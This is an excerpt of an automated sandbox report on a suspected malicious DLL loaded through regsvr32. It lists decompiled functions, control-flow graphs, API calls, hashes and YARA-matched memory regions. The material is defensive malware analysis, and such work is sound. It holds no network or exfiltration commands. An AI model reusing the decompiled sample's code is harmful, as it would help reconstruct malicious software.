                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315457526.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315482753.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315498265.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315506082.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: EnvironmentFreeStrings$Heap$AllocErrorLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3331406755-0
                                                                                                                                                                                                                    • Opcode ID: 825ce012b9cb48ab94c3413abdd1171c1895b64bc4b61d191bc328906b2b8bd4
                                                                                                                                                                                                                    • Instruction ID: 864329f4ba152f277f2adf48c891db3446df78698e664f4bc60f625a72c2a341
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 825ce012b9cb48ab94c3413abdd1171c1895b64bc4b61d191bc328906b2b8bd4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64318631608B5881FBA6DF2568403DA7794B78DFD4F48C229FA9A43BD5DF38C6498700
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 02593988 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 105processCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 420 2593988-2593a3e call 2599f38 423 2593acc-2593b12 CreateProcessW 420->423 424 2593a44-2593ac6 call 258a940 420->424 424->423
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateProcess
                                                                                                                                                                                                                    • String ID: li
                                                                                                                                                                                                                    • API String ID: 963392458-3170889640
                                                                                                                                                                                                                    • Opcode ID: df447d1959c748b5d8cf34ebfef7c4b31b83bdbcb52bf56f40cb8f0245456118
                                                                                                                                                                                                                    • Instruction ID: 3d6131496ca15e1f1fce64f480c2edae81ca5a5076460c7d7f09a1d1e28e734c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: df447d1959c748b5d8cf34ebfef7c4b31b83bdbcb52bf56f40cb8f0245456118
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6541E47091CB848FDBA4DF18D0C979AB7E0FB98319F20495DE488C7295CB789884CB86
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 000000018000D26C Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 427 18000d26c-18000d289 428 18000d2b4-18000d2c1 call 180008160 427->428 429 18000d28b-18000d29c call 1800086f4 call 1800085b8 427->429 435 18000d2c7-18000d2ce 428->435 440 18000d29e-18000d2b3 429->440 437 18000d306-18000d312 call 1800081b4 435->437 438 18000d2d0-18000d2db 435->438 437->440 441 18000d2dd 438->441 442 18000d2df call 18000d174 438->442 444 18000d301-18000d304 441->444 446 18000d2e4-18000d2eb 442->446 444->435 447 18000d2f2-18000d2fb 446->447 448 18000d2ed-18000d2f0 446->448 447->444 448->437
                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                    			E0000000118000D26C(void* __ecx, intOrPtr* __rax, long long __rbx, long long __rdi, long long __rsi, long long _a8, long long _a16, long long _a24) {

				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				if (__ecx - 0x2000 < 0) goto 0x8000d2b4;
				E000000011800086F4(__ecx - 0x2000, __rax);
				 *__rax = 9;
				E000000011800085B8();
				return 9;
			}



                                                                                                                                                                                                                    0x18000d26c
                                                                                                                                                                                                                    0x18000d271
                                                                                                                                                                                                                    0x18000d276
                                                                                                                                                                                                                    0x18000d289
                                                                                                                                                                                                                    0x18000d28b
                                                                                                                                                                                                                    0x18000d295
                                                                                                                                                                                                                    0x18000d297
                                                                                                                                                                                                                    0x18000d2b3

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315466083.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315457526.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315482753.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315498265.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315506082.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                    • Opcode ID: b2bec9f1c83fd2e5dff941a4990122d97467662781677e8ba2cfdbb0e4efa737
                                                                                                                                                                                                                    • Instruction ID: 290c2a04846c9b039a5155463e3184fcb060a742c36b4207bfb39a2b49eb85f2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b2bec9f1c83fd2e5dff941a4990122d97467662781677e8ba2cfdbb0e4efa737
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3911AC3210468C82F383DF14E8507D9B7A4FB5C7C0F058426FA9547BAADF38CA199B50
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0000000180008714 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 449 180008714-180008723 450 180008733-180008743 449->450 451 180008725-180008731 449->451 453 18000875a-180008772 RtlAllocateHeap 450->453 451->450 452 180008776-180008781 call 1800086f4 451->452 458 180008783-180008788 452->458 454 180008774 453->454 455 180008745-18000874c call 18000c08c 453->455 454->458 455->452 461 18000874e-180008758 call 18000abf8 455->461 461->452 461->453
                                                                                                                                                                                                                    C-Code - Quality: 44%
                                                                                                                                                                                                                    			E00000001180008714(void* __eax, signed int __rcx, signed int __rdx) {
				void* __rbx;
				intOrPtr* _t22;
				signed int _t29;

				_t29 = __rdx;
				if (__rcx == 0) goto 0x80008733;
				_t1 = _t29 - 0x20; // -32
				_t22 = _t1;
				if (_t22 - __rdx < 0) goto 0x80008776;
				_t25 =  ==  ? _t22 : __rcx * __rdx;
				goto 0x8000875a;
				if (E0000000118000C08C() == 0) goto 0x80008776;
				if (E0000000118000ABF8(_t22,  ==  ? _t22 : __rcx * __rdx,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0x80008776;
				RtlAllocateHeap(??, ??, ??); // executed
				if (_t22 == 0) goto 0x80008745;
				goto 0x80008783;
				E000000011800086F4(_t22, _t22);
				 *_t22 = 0xc;
				return 0;
			}






                                                                                                                                                                                                                    0x180008714
                                                                                                                                                                                                                    0x180008723
                                                                                                                                                                                                                    0x180008727
                                                                                                                                                                                                                    0x180008727
                                                                                                                                                                                                                    0x180008731
                                                                                                                                                                                                                    0x18000873f
                                                                                                                                                                                                                    0x180008743
                                                                                                                                                                                                                    0x18000874c
                                                                                                                                                                                                                    0x180008758
                                                                                                                                                                                                                    0x180008769
                                                                                                                                                                                                                    0x180008772
                                                                                                                                                                                                                    0x180008774
                                                                                                                                                                                                                    0x180008776
                                                                                                                                                                                                                    0x18000877b
                                                                                                                                                                                                                    0x180008788

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(?,?,00000000,0000000180007F92,?,?,0000AAF8A09CC6D2,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000), ref: 0000000180008769
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315466083.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315457526.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315482753.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315498265.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315506082.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                    • Opcode ID: 7cf3c04cd0eb283655c87112c6735f3b789bd4b36bb41325690c7ae62c9b4c65
                                                                                                                                                                                                                    • Instruction ID: 66bea78d34406d615fa8c08e42eaa36a882f8058afe23dfc71e7ff7acb685faa
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7cf3c04cd0eb283655c87112c6735f3b789bd4b36bb41325690c7ae62c9b4c65
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A1F06D74309A0881FED7D7A599003D522D16F5CBC0F2CD4302D4E863DAEE1CC788A320
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0000000180001268 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    C-Code - Quality: 71%
                                                                                                                                                                                                                    			E00000001180001268(void* __ecx) {
				void* __rbx;
				void* _t12;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;

				_t2 =  ==  ? 1 :  *0x80021ae0 & 0x000000ff;
				 *0x80021ae0 =  ==  ? 1 :  *0x80021ae0 & 0x000000ff;
				E00000001180001A80(1, _t12, __ecx, _t17, _t18, _t19, _t20, _t21);
				if (E00000001180002A08() != 0) goto 0x80001297;
				goto 0x800012ab; // executed
				E00000001180006CDC(_t17); // executed
				if (0 != 0) goto 0x800012a9;
				E00000001180002A58(0);
				goto 0x80001293;
				return 1;
			}










                                                                                                                                                                                                                    0x18000127c
                                                                                                                                                                                                                    0x18000127f
                                                                                                                                                                                                                    0x180001285
                                                                                                                                                                                                                    0x180001291
                                                                                                                                                                                                                    0x180001295
                                                                                                                                                                                                                    0x180001297
                                                                                                                                                                                                                    0x18000129e
                                                                                                                                                                                                                    0x1800012a2
                                                                                                                                                                                                                    0x1800012a7
                                                                                                                                                                                                                    0x1800012b0

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 000000018000128A
                                                                                                                                                                                                                      • Part of subcall function 0000000180002A08: __vcrt_initialize_locks.LIBVCRUNTIME ref: 0000000180002A0C
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315466083.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315457526.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315482753.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315498265.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315506082.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: __scrt_dllmain_crt_thread_attach__vcrt_initialize_locks
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 108617051-0
                                                                                                                                                                                                                    • Opcode ID: b3a5aff99e9bbd50fc4b4caf8482eddb7f62de2f1dfabb963a32cf9525c58297
                                                                                                                                                                                                                    • Instruction ID: 3927130d99c38a55cbe47f9f4b507d4a3e007974ffcd633e9ac0bb37393e6b58
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3a5aff99e9bbd50fc4b4caf8482eddb7f62de2f1dfabb963a32cf9525c58297
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66E01A30B0528C8EFEE7E6B525423F937501B1E3C2F40D068B892825838D0947AD5722
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0000000180010A8E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315466083.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315457526.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315482753.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315498265.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315506082.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: LoadString$ExitProcess
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 80118013-0
                                                                                                                                                                                                                    • Opcode ID: 4511720a80b85894ed9872a941f45ad7e5906891a0c13688ba3e14c3fa3ec101
                                                                                                                                                                                                                    • Instruction ID: b62d2fb12763fda2a64a5ee64e5548852d899a580494aacca0011f8ebade0f7c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4511720a80b85894ed9872a941f45ad7e5906891a0c13688ba3e14c3fa3ec101
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E1D0C936625A4892E7A29B61F80578A2390B78C7D4F809111A98C42A24CF2CC2098B00
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                    Function 0000000180014555 Relevance: 216.5, APIs: 144, Instructions: 493COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315466083.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315457526.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315482753.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315498265.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315506082.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLastShowWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3252650109-0
                                                                                                                                                                                                                    • Opcode ID: 9a665b6fd1606399514c88e51871797ade4cb1dce934726ac272da09cbabfbb3
                                                                                                                                                                                                                    • Instruction ID: 20d447c0f35bcb8e3c3c297cfd2fae4a36a0868fd259666119818285c186e9df
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a665b6fd1606399514c88e51871797ade4cb1dce934726ac272da09cbabfbb3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B522B976B00E0986FBDB9F72AC1439B22A2AB8CBD5F46C439E40689174DE7DC75D8305
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0000000180001C48 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315466083.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315457526.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315482753.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315498265.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315506082.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3140674995-0
                                                                                                                                                                                                                    • Opcode ID: 1ffe1e744cccfe4686aba7d6a8aca853fc79a5f69e58afced9d2bc9442cc5b87
                                                                                                                                                                                                                    • Instruction ID: 43a781f402e08a9585d1bfd569913690a5560a40171371ec2054230cf506bc92
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ffe1e744cccfe4686aba7d6a8aca853fc79a5f69e58afced9d2bc9442cc5b87
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1931FB72605B848AEBA1DF60E8507EE7365F788785F44842AEB4E47A99DF38C74CC710
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00000001800082EC Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    C-Code - Quality: 65%
                                                                                                                                                                                                                    			E000000011800082EC(void* __ecx, intOrPtr __edx, long long __rbx, long long __rsi) {
				void* _t36;
				int _t38;
				signed long long _t60;
				long long _t63;
				_Unknown_base(*)()* _t82;
				void* _t86;
				void* _t87;
				void* _t89;
				signed long long _t90;
				struct _EXCEPTION_POINTERS* _t95;

				 *((long long*)(_t89 + 0x10)) = __rbx;
				 *((long long*)(_t89 + 0x18)) = __rsi;
				_t87 = _t89 - 0x4f0;
				_t90 = _t89 - 0x5f0;
				_t60 =  *0x80021010; // 0xaaf8a09cc6d2
				 *(_t87 + 0x4e0) = _t60 ^ _t90;
				if (__ecx == 0xffffffff) goto 0x8000832b;
				E00000001180001C40(_t36);
				r8d = 0x98;
				E00000001180002680();
				r8d = 0x4d0;
				E00000001180002680();
				 *((long long*)(_t90 + 0x48)) = _t90 + 0x70;
				_t63 = _t87 + 0x10;
				 *((long long*)(_t90 + 0x50)) = _t63;
				__imp__RtlCaptureContext();
				r8d = 0;
				__imp__RtlLookupFunctionEntry();
				if (_t63 == 0) goto 0x800083be;
				 *(_t90 + 0x38) =  *(_t90 + 0x38) & 0x00000000;
				 *((long long*)(_t90 + 0x30)) = _t90 + 0x58;
				 *((long long*)(_t90 + 0x28)) = _t90 + 0x60;
				 *((long long*)(_t90 + 0x20)) = _t87 + 0x10;
				__imp__RtlVirtualUnwind();
				 *((long long*)(_t87 + 0x108)) =  *((intOrPtr*)(_t87 + 0x508));
				 *((intOrPtr*)(_t90 + 0x70)) = __edx;
				 *((long long*)(_t87 + 0xa8)) = _t87 + 0x510;
				 *((long long*)(_t87 - 0x80)) =  *((intOrPtr*)(_t87 + 0x508));
				 *((intOrPtr*)(_t90 + 0x74)) = r8d;
				_t38 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(_t82, _t86);
				if (UnhandledExceptionFilter(_t95) != 0) goto 0x80008420;
				if (_t38 != 0) goto 0x80008420;
				if (__ecx == 0xffffffff) goto 0x80008420;
				return E000000011800010B0(E00000001180001C40(_t40), __ecx,  *(_t87 + 0x4e0) ^ _t90);
			}













                                                                                                                                                                                                                    0x1800082ec
                                                                                                                                                                                                                    0x1800082f1
                                                                                                                                                                                                                    0x1800082fa
                                                                                                                                                                                                                    0x180008302
                                                                                                                                                                                                                    0x180008309
                                                                                                                                                                                                                    0x180008313
                                                                                                                                                                                                                    0x180008324
                                                                                                                                                                                                                    0x180008326
                                                                                                                                                                                                                    0x180008332
                                                                                                                                                                                                                    0x180008338
                                                                                                                                                                                                                    0x180008343
                                                                                                                                                                                                                    0x180008349
                                                                                                                                                                                                                    0x180008353
                                                                                                                                                                                                                    0x18000835c
                                                                                                                                                                                                                    0x180008360
                                                                                                                                                                                                                    0x180008365
                                                                                                                                                                                                                    0x18000837a
                                                                                                                                                                                                                    0x18000837d
                                                                                                                                                                                                                    0x180008386
                                                                                                                                                                                                                    0x180008388
                                                                                                                                                                                                                    0x18000839b
                                                                                                                                                                                                                    0x1800083a8
                                                                                                                                                                                                                    0x1800083b1
                                                                                                                                                                                                                    0x1800083b8
                                                                                                                                                                                                                    0x1800083c5
                                                                                                                                                                                                                    0x1800083d7
                                                                                                                                                                                                                    0x1800083db
                                                                                                                                                                                                                    0x1800083e9
                                                                                                                                                                                                                    0x1800083ed
                                                                                                                                                                                                                    0x1800083f1
                                                                                                                                                                                                                    0x1800083fb
                                                                                                                                                                                                                    0x18000840e
                                                                                                                                                                                                                    0x180008412
                                                                                                                                                                                                                    0x180008417
                                                                                                                                                                                                                    0x180008446

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315466083.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315457526.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315482753.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315498265.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315506082.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1239891234-0
                                                                                                                                                                                                                    • Opcode ID: d0fc5085bf44c4937be082645d9f0fd030d92464e7166f1adeb9fe9a04ad5cc9
                                                                                                                                                                                                                    • Instruction ID: d6e40695d6015e5c843dff92317e70983bbd332ebd8c23179410134a75d63e3d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d0fc5085bf44c4937be082645d9f0fd030d92464e7166f1adeb9fe9a04ad5cc9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7E315032604F8486DBA1CF25E8407DE73A4F788798F544116FA9D43B59DF38C259CB00
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0258F8C4 Relevance: 6.6, Strings: 5, Instructions: 393COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: G]W2$Uf$Wlw$X2D7$n
                                                                                                                                                                                                                    • API String ID: 0-182303197
                                                                                                                                                                                                                    • Opcode ID: 5ce9af85c0101b92db01bf743a5277ddb3699d4210e4094ad3775c6a215530db
                                                                                                                                                                                                                    • Instruction ID: 5ca970e37a49d8bc6e7bfe1ddf72a2364e55a86a4a8dd7c66eb1252ea13ba3bb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ce9af85c0101b92db01bf743a5277ddb3699d4210e4094ad3775c6a215530db
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 89121770A04709EFDB58DF68C18A99EBBF1FF48304F40856DE84AAB250D775DA18CB45
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 02595384 Relevance: 6.6, Strings: 5, Instructions: 313COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: GK$M/uB$Q|-$~~K$Bt$
                                                                                                                                                                                                                    • API String ID: 0-557373213
                                                                                                                                                                                                                    • Opcode ID: 5399f6d2f4ddd76430553fcbb3a69801bb23c4fdd32863c07da465c7968e24a8
                                                                                                                                                                                                                    • Instruction ID: ffe0cdda758f7065b6c07d4cf5d8792026e09f4daeb0cbb033a1c12ef1b982ba
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5399f6d2f4ddd76430553fcbb3a69801bb23c4fdd32863c07da465c7968e24a8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8FE1027550260CCBDF68DF38C0994D93BE1FF58308F611229FC6AA62A2DBB4D914CB48
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 02588378 Relevance: 6.5, Strings: 5, Instructions: 238COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: .I$gBfh$i[$w|${
                                                                                                                                                                                                                    • API String ID: 0-448909954
                                                                                                                                                                                                                    • Opcode ID: fd252399347da21463b78aeaa0d34fc6630a10d5928b5024a52fe33a2729c415
                                                                                                                                                                                                                    • Instruction ID: 2891c9c8f811eeb06bbe9f2ffab019b5b8b9f05b8b7506ecc227ec54ea475d59
